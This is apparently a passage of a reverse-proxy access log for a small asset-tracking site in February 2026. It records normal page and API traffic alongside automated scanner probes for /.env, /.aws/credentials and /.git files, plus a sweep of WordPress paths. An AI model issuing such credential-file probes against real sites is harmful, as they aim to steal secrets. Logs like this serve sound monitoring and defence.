"https://asset.hanmocnn.co.kr/" -[16/Feb/2026:12:06:42 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 30870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:19:45:29 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr" -[16/Feb/2026:19:45:30 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr" -[16/Feb/2026:20:29:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:20:29:58 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:20:29:58 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:20:29:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:20:29:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:20:29:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:20:30:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:22:29:27 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/HEAD" [Client 14.153.67.121] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" "-" -[16/Feb/2026:22:29:29 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.aws/credentials" [Client 190.87.168.129] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" -[16/Feb/2026:22:29:31 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.env" [Client 216.147.127.93] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" -[17/Feb/2026:00:08:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" -[17/Feb/2026:04:14:55 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[17/Feb/2026:04:14:56 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:04:16:45 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:04:16:45 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:04:16:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:04:16:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:04:17:49 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5976] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:06:05:59 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:06:06:06 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 45.94.31.224] [Length 0] [Gzip -] [Sent-to ] "-" "-" -[17/Feb/2026:09:11:03 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr" -[17/Feb/2026:09:11:05 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr" -[17/Feb/2026:10:47:28 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[17/Feb/2026:10:47:28 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:10:47:28 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:10:47:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:10:47:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:10:47:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:10:47:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 1856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:10:47:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.232] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:11:31:04 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" "-" -[17/Feb/2026:11:31:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-" -[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:12:33:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:12:33:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:12:34:23 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:13:01:11 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 14383] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:13:36:27 +0000] - 200 200 - POST https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:13:36:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 3242] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:18:19:07 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 